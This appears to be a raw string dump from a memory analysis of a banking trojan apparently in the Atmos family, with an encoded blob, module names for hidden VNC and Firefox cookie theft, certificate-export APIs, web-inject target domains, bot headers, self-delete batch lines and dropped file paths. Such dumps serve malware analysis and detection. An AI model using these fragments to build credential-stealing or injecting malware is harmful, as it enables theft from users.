hQQZBbCiXHRvYT0LMALC4KzcYhBVimTnaCzF92A/IwjwmuMcLdSrwxeDl hgJ64QRn4shSxTV72EJEeStKbUWop6I3XrGwDJziks02zJZ8Ngv5XQj8/6DVvQGXFx4TWNeBjq bLTDVLKQUg0huyqGeRETme3vgtHptbc3HtKLcy0vfPN7ho3GliJnfIlnwhAqPHR5IA154JiYW0oM7LzXCvf1CKxpj1LiIrZnwB6d7Jtt3Q8QKx 0eOeMKVM0ssWxpfLZL071LCj9dr01FLINneXWUENh HrZMrHiIwMc1UdC1vKZBx pQDZ646bysxGLoBQGMRzGdjCDwvbbfEXBUrd/g9Fb8hisLCdrpwEdRSFKUJPqH3u0UM6aNat6SOaQC2KyCuj XpXuVQl42OBunYjp28FYnjJ69lTqmpbMzQlwbndruPKMFUzTs7exQHCtDnZmeknvkCEDf6KSkltgHq1kAC84KUjHejJtsRDuBx0 zeOZ7k1xdwTTZ6D09GDNmaScqIuJBvxivLT94S5LKC6lFbmV89F32bLDuyMgdZst/wMPHcFbzg05tfs7uTHFvQFFuOLpHnHSgPnuNioE97QtBFTp6b9JZbfpd2gx jCYIjC6 c jSeFFiVxYZXbEZZZwc/YdSdKleWp1mhPeQm3JVaKaTXHwATQyKbAA5StQDJ1vp7z0ktMKi6ccOlyToNIZKAtx2K5VhhYNCQuk3aOczite07juFnr4cqEWU3ExokG73gHNySThVIb7F4aSuWLuvjJBJIPKF40P9iC768a11KJFrEnBjefcP2wz/YSZVEB4nyEQ06n3xYDzUt/F2cZ5JjhDq88rEvlE24 rRGht8HZgCa5XNtR51BNuBt3pp2eW78aCwiOEI8VDbn7AruVqkZrQQyYiz6MehXkTK77WrmjXVq5vzgUt4Jzu0pRfZGETR3S5xfz5uV2giiqXE6lYyjuBM0jm2JNf nUn iN35Go8p0Li5fuLrpjddQ1dFuKdDNclSXqPKGbcZU125ad0veW6dcXfvAw/P9kMO8/TKTtnfOw8XBDk2xHFOeyXOK/91hTRYgWLfAdC40pzwnNwRaWu2Aaw/vVSJQ/gFTtm5GDHCSIcKgmANglVtydNm8YkauqtmguErNundREO/6Xo5XpIF3kajshYV/7KjUgwJi9iqoftmRJ94/Tnr70imCuitzO5r81yZ3k1z4U 9Me8weKT69PB2aJTIMhrak6AV 2frGulcO1ju8IPk7W8QOYSGWq cymI4z/Bz5J1hFhMdrMzlFpBMzPF5zagQCDIFZV1HxA/RIEJeOKSZ4Sh1I 9/BXsFpOpr2zx DNvJXmpvgC81f5ca1ECBLO/o23asth4rsaKfBTvd5V ATraypf 5cH1w0H28a4Eb/Ho1gl2smdg5cfdBCyocaFQDyIhrgvO7l5RCcuG3sdDcbJzIvOHqtH8pP0vLIc1VLyyMD3b7vBzGSOxGaKGHNKEu/tR524QME0URfvXsGZU8fGNDZ3DE10bOQXQowrs34DwRQV3hyjTDDars/0rORfN73HxM NtO/9LTyB1neFGw7bd2xFjJ2 3mCbtmCg8m3ZfOK05dJ4zWtSUplLfpExGp NvDcwcq6kkSmvNjPrOG3lzUOkNU5LFwX fTSCdGTCfQ N7KO1iQp/ daGpiDbXS 1MYRI956xhzL6PchxIYyRYVOWPUSHrfgnlyaWcxAMhaj03mV4zdJncZwfgv/Dp1uMJAS0hikYb4RZOGHA7dU9G9T9SKw3OKguTYyrTdA55njE7WjvmI4MENhf2qDHPZ9g1qUSFArRTPUCG7yzx1NnKVcWcY7HkEV0j 9CGlVGrJ1 MiBpVEqzDY0vUeOH275PySs/rqsXNDJpLbNDmE0lbRtaNaOy3a3Tqdhx7Jx0Z84NQ9dllnjga9w XIiFWm5OwD P3yTbjqWPOTitm6HJkdvvvlBcOQSs8xyA9/Dvi/Uq0 rvcAOzBFRMoXpegqOp4ABA3rVGt6ooxDsMypVtyWhxdVWhkVraQr uMTeCoYUzwKWcOAP1AemeqcpTP6gxooeAaaTiEWs1Zs6 iB9 lIvynIWBmiCIJPTRXStMLo0r/dEUj4CiHg45RQB2syBda9JjdY0XGYeCNCLbz1JIZ27UeD6bi2aM/5n3a9MMny52SDEyjfO7Fm/sgwJu9KyKQtZOsuBOAU3iF4mpGB7NSG9y4I1fUVKO/QPr/Ri5wmz Zni3fuAEWTwd03qfK8ywZK0b5lagpTXuDab20 x86fQueLed2rRyaNQHQ4A/K7LlV/wNztP1gOQWKd/XqmkNNTUA3YqcXgA7 fFh0DdaKIz3ux5YYm6WpoR IjvZI0DudKoBDT5vbcg7awPBaPHmiwNi7krMp/wRhFAQ51N3v214gjeaW1j6bMR3lA9SoI3D7f1UnUxeMVlpAi9NPSkr/bs3ww4vgTkH3mWPh6JMWUXZ9/JW9DUb44EbqU sZnH33VZYhTRXvzPbeM33RlQ5PN4a5junE3q9tDwTu/7TzGARQvjLcA OST6QkmSObIMuhwG29jbvnhbVkBoBF87U3y9At2usdlnDTqn4XpLgEzr7y2hW28IwB1IMTp9Lc6bs/CzxMTIhGomY3XuLHQwzR1JP47OS7oEmIqKqem/ZsWC1L6lxU8Ij7UPvlreS4ivFjOEkMFyOaba3a8HZ73Sz64k5kbCOaBgeIe73I3WYHege7t2AgsSmDfb mNbiqCpwT 8n/rYk/wFRgOhtF96FVrvKvvPQztLJTcWvQXDm8uncg auwcf KcNWpM5EsstUrJCnazVk28hDtvnVNw73zsmW6HORlfumWpVIqHmVaZ3GKzvu2/WkM9D76zHfFGxzSTmu/QY3v1nk3Z38ky 4FH5uyR0svcFUUmMICwF5 PubCdBq1XivsKGdcDKqwIagfL65CWPpHVBYhoPyPi/s1qIx5KPp/huaJWUkExnCC33e3S0XEoYM0ZtV6U08/fgJph0RqHyYg02Xf6Y3oM t5bEe2pKglGlExbApVTV6ZLKYKGPfbJuZQbAXCC5y8kZBk8efHtSk1OJqVXdBdu3xPesAqf5c8O5VK3gsoeZaEF0FCxBKj tz9vYZC02eQe6 suEpXVRAPmlwFByKUJyGIItA9 1hCBMuyNl sEz8p2qAH4aRiN3EeO3FcpPLwI3V4H6WVQOH2cR QoDJqfl1MzjOtbYnwZ2z2o j3EoDrkuN/dNQdwGlWXgYp2Ka4Dokjf N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD"

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile

"c:\docume~1\"%CurrentUserName%"\locals~1\temp\tmpf7521b9d\bindata865.exe" path>path inj_ffile>inj_ffile

regsvr32.exe_3264_rwx_00070000_00047000:

.text

.text

`.data

`.data

.reloc

.reloc

update.exe

update.exe

config.bin

config.bin

%0&!%F

%0&!%F

?)500>(8

?)500>(8

7-52&

7-52&

,%)4.5(";$2

,%)4.5(";$2

:'$!71689/

:'$!71689/

-0=).?,7

-0=).?,7

60/)4:5

60/)4:5

-*?)2

-*?)2

>5;(4-2>)4 }744

>5;(4-2>)4 }744

"?5&"5%3%/

"?5&"5%3%/

398>7="'

398>7="'

;!)5:. =##

;!)5:. =##

Z#%xDVOE

Z#%xDVOE

(00(7> 59

(00(7> 59

$6>59$=1

$6>59$=1

^EXKSQN_^%X Sf

^EXKSQN_^%X Sf

PR_OpenTCPSocket

PR_OpenTCPSocket

%s%s%s

%s%s%s

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

ole32.dll

ole32.dll

gdi32.dll

gdi32.dll

?

?

value=[%s], code=[%s]

value=[%s], code=[%s]

HTTP/1.1

HTTP/1.1

HTTP/1.0

HTTP/1.0

hXXps://

hXXps://

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

HTTP/1.

HTTP/1.

X-WebKit-CSP

X-WebKit-CSP

hXXp://VVV.google.com/webhp

hXXp://VVV.google.com/webhp

%COMMANDSERVER%

%COMMANDSERVER%

hXXp://127.0.0.1:%u/

hXXp://127.0.0.1:%u/

X-Type: %s

X-Type: %s

_getFirefoxCookie

_getFirefoxCookie

hXXp://

hXXp://

atmos_hvnc.module

atmos_hvnc.module

atmos_ffcookie.module

atmos_ffcookie.module

atmos_video.module

atmos_video.module

userenv.dll

userenv.dll

del "%s"

del "%s"

if exist "%s" goto d

if exist "%s" goto d

del /F "%s"

del /F "%s"

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

urlmon.dll

urlmon.dll

cabinet.dll

cabinet.dll

hXXp://xxxxxxxx.com/xxxx/xxxx.php

hXXp://xxxxxxxx.com/xxxx/xxxx.php

%s, u %s %u u:u:u GMT

%s, u %s %u u:u:u GMT

; charset=%s

; charset=%s

HTTP/1.1 %u %s

HTTP/1.1 %u %s

Date: %s

Date: %s

Content-Length: %u

Content-Length: %u

Expires: %s

Expires: %s

Content-Type: %s%s

Content-Type: %s%s

ID: %s

ID: %s

value_%s

value_%s

value_%s_%s

value_%s_%s

%s = "%s";

%s = "%s";

*.facebook.com

*.facebook.com

*.twitter.com

*.twitter.com

*.instagram.com

*.instagram.com

*.booking.com

*.booking.com

*.sharepoint.com

*.sharepoint.com

*.yahoo.com

*.yahoo.com

login.yahoo.com

login.yahoo.com

*.google.com

*.google.com

accounts.google.com

accounts.google.com

192.168.*.*

192.168.*.*

127.0.0.1

127.0.0.1

*/wp-login.php*

*/wp-login.php*

*.xn--p1ai

*.xn--p1ai

Cookie: %s

Cookie: %s

Referer: %s

Referer: %s

Accept: %s

Accept: %s

Accept-Language: %s

Accept-Language: %s

Accept-Encoding: %s

Accept-Encoding: %s

SSSh8

SSSh8

9.tI3

9.tI3

CreatePipe

CreatePipe

GetWindowsDirectoryW

GetWindowsDirectoryW

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

RegCreateKeyW

RegCreateKeyW

RegEnumKeyW

RegEnumKeyW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

UrlUnescapeA

UrlUnescapeA

SHDeleteKeyW

SHDeleteKeyW

PathIsURLW

PathIsURLW

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

Secur32.dll

Secur32.dll

GDI32.dll

GDI32.dll

WS2_32.dll

WS2_32.dll

PFXImportCertStore

PFXImportCertStore

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertOpenSystemStoreW

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestA

HttpSendRequestA

HttpSendRequestA

HttpEndRequestW

HttpEndRequestW

GetUrlCacheEntryInfoW

GetUrlCacheEntryInfoW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

InternetCrackUrlA

InternetCrackUrlA

InternetCrackUrlW

InternetCrackUrlW

WININET.dll

WININET.dll

OLEAUT32.dll

OLEAUT32.dll

NETAPI32.dll

NETAPI32.dll

VERSION.dll

VERSION.dll

NtQueryKey

NtQueryKey

ntdll.dll

ntdll.dll

PSSSSSSh

PSSSSSSh

SSSh4

SSSh4

SUWt^Ht[Ht.Huc

SUWt^Ht[Ht.Huc

2!242:2?2[2

2!242:2?2[2

Chrome

Chrome

Firefox

Firefox

nnspr4.dll

nnspr4.dll

nss3.dll

nss3.dll

chrome.dll

chrome.dll

Process (u minute): %s

Process (u minute): %s

Input: %s

Input: %s

X-TS-Rule-Name: %s

X-TS-Rule-Name: %s

X-TS-Rule-PatternID: %u

X-TS-Rule-PatternID: %u

X-TS-BotID: %s

X-TS-BotID: %s

X-TS-Domain: %s

X-TS-Domain: %s

X-TS-SessionID: %s

X-TS-SessionID: %s

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

X-TS-Header-Cookie: %S

X-TS-Header-Cookie: %S

X-TS-Header-Referer: %S

X-TS-Header-Referer: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-UserAgent: %S

X-TS-Header-UserAgent: %S

kernel32.dll

kernel32.dll

Global\XXX

Global\XXX

Company: %s

Company: %s

Product: %s

Product: %s

Version: %s

Version: %s

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall

%u: %s | %s | %s

%u: %s | %s | %s

%sd1%

%sd1%

%sd2%

%sd2%

Name: %s

Name: %s

Path: %s

Path: %s

Hash: %s

Hash: %s

Time: u.u.u

Time: u.u.u

\StringFileInfo\xx\%s

\StringFileInfo\xx\%s

"%s" %s

"%s" %s

/c "%s"

/c "%s"

%sx.%s

%sx.%s

%sx

%sx

SELECT * FROM %s

SELECT * FROM %s

Rapport

Rapport

sXXXX

sXXXX

d*.swf

d*.swf

*.flv

*.flv

*.png

*.png

*.jpg

*.jpg

*.ico

*.ico

*.gif

*.gif

*.css

*.css

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

odobdima.xia

odobdima.xia

%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

zaodxiibaru.ilb

zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

regsvr32.exe_3264_rwx_000D0000_000C0000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp4

IWebBrowserApp4

IWebBrowser2l

IWebBrowser2l

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

3,313[3`3

3,313[3`3

829

829

=.=3=[=`=

=.=3=[=`=

>!>&>7>

>!>&>7>

7)707;7@7

7)707;7@7

= =$=,=_=

= =$=,=_=

?0'101>1

?0'101>1

: :&: :}:

: :&: :}:

?,?;?@?^?

?,?;?@?^?

8 8$8(8,808

8 8$8(8,808

c2h3PgXWqt2QzTRrb/AnQFC6SRUgWch7j77TVxtWrXEisi5gWjLIKgQWWPjhp0UgEz/kVUGNipnIPLZxi8BxUOwd9J5DQbsosxVqooPcMxy2MFTKpmT8aROKg4jgPL5ULF6ilWRorquC8m0XR dR8hd6QeMVN1z8qMkD1vqxgm4LrkB3rrUobN/saPP2hYsk6VQTT5huKnOMVL5caR5vadBp7OdRzhgDnQIi0zuYfIv v02VfY9J3rrQjqC1 pFYIFt3Gp4UAQmbDJLGUi8hvJ5jIHnHXh6ZdE G2FTkJ3CI2Lj2wf8fOmqGCNuCUBH6Ec7vvAylDcuOVeqr6H9 GqsS1IfkCCllztP/uhBjWjey5V SSDAqDhRCVH uTCvACRGgad bO9wKfoRWb20kkPK8CJRO3Cb3ZBKGOeh51oRkebuOLldMrwBX33FmSkln88u4JdiIX3EOwtJpJ8fNuFb9sVJKqbY0xHN8Kq1Or8RhXvuFhn9jvExwsg77Nm9pukUDgOKXK2YjwzI43i2jlgqjXRjPGNPPw8yrBpOYbuqtlz4xPvXSChtWkqlonwCNmHPfYIqUJsozXDoUSntJjEjPKcnSYnNd4VI/OTKRZl4s3QZK4AiriXs m2G8zO3JfYHA4Mzloj7x/ZrAhvhzeMKq4FLKRhJG4T2JXyLgwvQjwXdohUQg4iEYHpcny L36V4uUkFcvU1tvpqDtiOQYa70HHcPEJfYLV8Toym38KdYL9IJPqUdop utIX7HhaldlXLQIAz7PWZnlHKctlhe5qmCRh7GYrijRosE0KLIyPrqsKKjC7bEFYXy01KABfO qe1pH4Q6vjT2LIWDeAU0QF7cNTSc9IrXxuiKrH9fzzDBmL0r2uP90MTpzx4Q6QXF6LFGMM4bSQRJvDy82dHpceQb5 wSJiwXfI1q0lw2j7yeKKU4d1S2yu1KSDqXTy9EIbNA OTz83nYnlm92yC4Q C1WaY TFWNwLLReTWs1XYS 